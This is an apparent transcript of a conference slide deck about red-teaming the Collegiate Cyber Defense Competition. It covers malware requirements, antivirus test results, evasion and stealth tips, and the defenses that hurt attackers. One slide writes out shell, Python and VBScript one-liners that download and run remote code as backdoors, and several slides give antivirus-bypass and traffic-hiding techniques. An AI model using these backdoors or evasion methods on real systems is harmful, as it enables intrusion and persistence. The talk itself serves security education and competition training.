red teaming the ccdc
DESCRIPTION
TRANSCRIPT
![Page 1: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/1.jpg)
Red Teaming the CCDChacking the most paranoid student system administrators in the nation
Matt “scriptjunkie” Weeks
![Page 2: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/2.jpg)
Some funny thingsOur mistakes and yours
![Page 3: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/3.jpg)
No, don’t start “aCcbsXoAIfRsU”
![Page 4: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/4.jpg)
Those other people logged-in are not
your friends.
![Page 5: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/5.jpg)
You planned to get hacked?
![Page 7: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/7.jpg)
![Page 8: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/8.jpg)
![Page 9: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/9.jpg)
![Page 10: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/10.jpg)
![Page 11: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/11.jpg)
![Page 12: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/12.jpg)
![Page 13: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/13.jpg)
![Page 14: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/14.jpg)
A year of curating red team wallpaper
![Page 15: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/15.jpg)
![Page 16: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/16.jpg)
Gotta keep up with changing memes
![Page 17: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/17.jpg)
The red team has you
![Page 18: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/18.jpg)
![Page 19: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/19.jpg)
Screenshot inception!
![Page 20: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/20.jpg)
![Page 21: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/21.jpg)
Personal Favorite
https://www.youtube.com/watch?v=TrnUO6TLrtE
![Page 22: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/22.jpg)
The malware gamesChallenges writing malware
![Page 23: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/23.jpg)
Requirements
Full-featured RAT
File access
Interactive shell
Screenshots, keylogger
May include stealth features
Basic backdoors
Used for re-establishing full-featured RAT
Simple command and/or shellcode execution
Callback or listening
Keylogger/persistent monitoring
File packing tools
Worms – every method possible
![Page 24: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/24.jpg)
Compatibility is hard
Windows XP – Win 8.1
Hook-based keylogging fails…
*NIX’s
Make Windows look great
No two Linux distros startup the same
OS X(!)
NetBSD
OpenBSD
FreeBSD
X64/x86
OpenIndiana (Solaris)
Ubuntu
Fedora
Linux Mint
![Page 25: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/25.jpg)
But hard work pays off, kids
![Page 26: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/26.jpg)
On-the-fly backdoors
Usually you are caught off-guard with at least one system
Webshell collections are your friend
Scripting skills are a must
while[ true ] ; do wget -O - http://a.bc/def | sh ; sleep 10 ; done
eval(urllib2.urlopen('http://a.bc/def').read())
echo Set x=CreateObject("Microsoft.XMLHTTP"):x.Open
"GET","http://a.bc/def",False:x.Send:Execute x.responseText >>v.vbs&start v.vbs
![Page 27: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/27.jpg)
First world red team problems:
I accidentally six or seven keylogger copies
![Page 28: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/28.jpg)
On Antivirus
-or-
why does
everybody
use MBAM?
![Page 29: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/29.jpg)
Process
Write malware
Does AV detect?
YesLook for
shady code
Obfuscate functions,
stringsDone!
No
![Page 30: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/30.jpg)
But usually
Write malware
Does AV detect?
Done!
No
![Page 31: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/31.jpg)
AV test lab
Top market share AV’s (Internet Security Suite version) on default settings
7 “fresh” tests (results BEFORE I knew what any of the AV’s would detect)
![Page 32: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/32.jpg)
Why not VirusTotal?
![Page 33: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/33.jpg)
Test 1: Widely known malware
with 1 byte appended
The only way to fail is by using giant hash lists instead of real signatures
FAIL
WIN
FAIL
WINFAIL
FAILFAILFAIL
WIN WIN WIN
WIN
![Page 34: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/34.jpg)
Test 2: Malware with public code
samples
FAIL FAIL
FAIL
FAILFAILFAIL
FAIL FAIL FAIL FAIL FAIL
FAIL
![Page 35: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/35.jpg)
Test 3: One-off malware with no
evasions
FAIL FAIL
FAIL
FAIL
FAIL FAIL INDECISIVE
FAIL
WINWIN
WININDECISIVE
![Page 36: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/36.jpg)
Test 4: “Chris’s Ex-Girlfriend” – Highly
evasive malware workhorse
FAIL FAIL
FAIL
FAILFAILFAIL
FAIL FAIL FAIL FAIL FAIL
FAIL
![Page 37: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/37.jpg)
Test 5: “The Kraken” – Sneaky firewall-
evading malware
FAIL FAIL
FAIL
FAILFAILFAIL
FAIL FAIL FAIL FAIL
FAIL
WIN
![Page 38: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/38.jpg)
Test 6: Worm with no evasions
FAIL FAIL
FAIL FAIL FAIL
FAIL
WIN WINFAIL
Hosed VMFAILFAIL
![Page 39: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/39.jpg)
Test 7: Legit program used maliciously
FAIL FAIL
FAIL
FAILFAIL
FAIL FAIL FAIL FAIL FAIL
FAILINDECISIVE
![Page 40: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/40.jpg)
Notes
Symantec was only AV to detect reverse meterpreter on the wire
Kaspersky’s behavioral emulation detected one worm well
Kaspersky and Comodo both recognized at least one piece of malware as
unusual, (not on whitelist) but not necessarily bad
Trend Micro was only AV to block hash dumping
Panda, Avast gave errors installing and were not tested
![Page 41: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/41.jpg)
Final standings
100% FAIL
meh
100% FAIL
TIED 1st100% FAIL
100% FAILFAILFAIL
meh TIED 1st 3rd
meh
![Page 42: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/42.jpg)
Just kidding. After 2 hours obfuscating,
these are the real final standings:
FAIL FAIL
FAIL
FAILFAILFAIL
FAIL FAIL FAIL FAIL FAIL
FAIL
![Page 43: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/43.jpg)
How do I bypass AV?
Write your own stuff
Dynamically resolve API calls
Obfuscate strings
Introduce environmental/system dependencies to generically thwart sandboxing
Write your own stuff
Impersonate legitimate software
Watch what hits disk
Digitally sign your stuff if you can
Write your own stuff
![Page 44: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/44.jpg)
Security Software Lessons
Some AV’s are a total fail
MalwareBytes Pro is in this list with MS, McAfee, F-Secure
Many have one really cool feature or heuristic
Kaspersky, Symantec, Trend Micro
All can be bypassed easily for most malware
Only detection remaining after 2 hours was one worm vs Kaspersky
![Page 45: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/45.jpg)
Hiding from the students
![Page 46: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/46.jpg)
Hiding from the students
Host hiding
Hide while running
Hide start
Meterpreter is great for functionality, bad for persistence
Mostly custom malware
Mostly standard persistence methods
Don’t run in your own process
Don’t use any of those toy languages with dependencies
Use C!
![Page 47: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/47.jpg)
Don’t hide stuff rootkit finders look for
![Page 48: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/48.jpg)
Don’t sweat the one-offs
![Page 49: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/49.jpg)
Hiding on the wires
Hiding from Wireshark
Harder than hiding on host
Try to blend in with normal traffic
Throw Wireshark crashers
Remove packets from view
Hiding from netstat/tcpview
Using HTTP(S) instead of TCP callbacks doesn’t leave connection open
If that fails, blend in by using common ports and cloud IP’s
Migrate session to web browser or critical process
![Page 50: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/50.jpg)
Hiding on the wires
Use every protocol that gets out
TCP
UDP
HTTPS
DNS
Use hop points in cloud/web hosting
Use file sharing/paste/social media sites
Random callback selection and delays to avoid monitors
Any way students can send or receive info, you can too
![Page 51: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/51.jpg)
Dealing with firewalls
Two types
Host
Network
Host firewalls
Usually don’t stop outbound traffic
Can go underneath, watch raw packets
Frequently add exceptions or drop the firewall
![Page 52: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/52.jpg)
Network firewalls
Great to own
Tough if you don’t
Use service ports since
they must be able to
reach the hosts
![Page 53: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/53.jpg)
Defenses that hurt
Patch or block RCE’s
Strict inbound and outbound network firewall rules
Traffic monitoring
Different passwords on all the boxes
Pull the plug
Reverting (sometimes)
Realizing that sometimes, the red team can’t hurt you as much as finishing
injects helps you
![Page 54: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/54.jpg)
Questions
@scriptjunkie1
https://scriptjunkie.us/